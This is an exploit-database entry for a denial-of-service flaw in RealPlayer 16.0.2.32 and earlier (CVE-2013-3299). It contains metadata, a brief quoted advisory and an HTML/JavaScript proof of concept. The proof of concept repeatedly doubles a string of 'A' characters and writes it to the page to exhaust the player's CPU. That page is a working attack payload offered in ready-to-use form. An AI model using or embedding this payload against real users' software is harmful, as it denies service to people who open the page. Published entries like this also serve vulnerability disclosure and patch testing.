EXPLOITS

RealNetworks RealPlayer - Denial of Service

Author: Akshaysinh Vaghela
type: dos
platform: multiple
port: 
date_added: 2013-07-02  
date_updated: 2015-11-05  
verified: 1  
codes: CVE-2013-3299;OSVDB-94806  
tags:   
aliases:   
screenshot_url:   
application_url:   

raw file: 38623.html  

source: https://www.securityfocus.com/bid/60903/info

RealNetworks RealPlayer is prone to a remote denial-of-service vulnerability.

Successful exploits will allow attackers to consume an excessive amount of CPU resources, denying service to legitimate users.

RealPlayer 16.0.2.32 and prior are vulnerable.

<html> <head> <script language="JavaScript"> { var buffer = '\x41' for(i=0; i <= 100 ; ++i) { buffer+=buffer+buffer document.write(buffer); } } </script> </head> </html>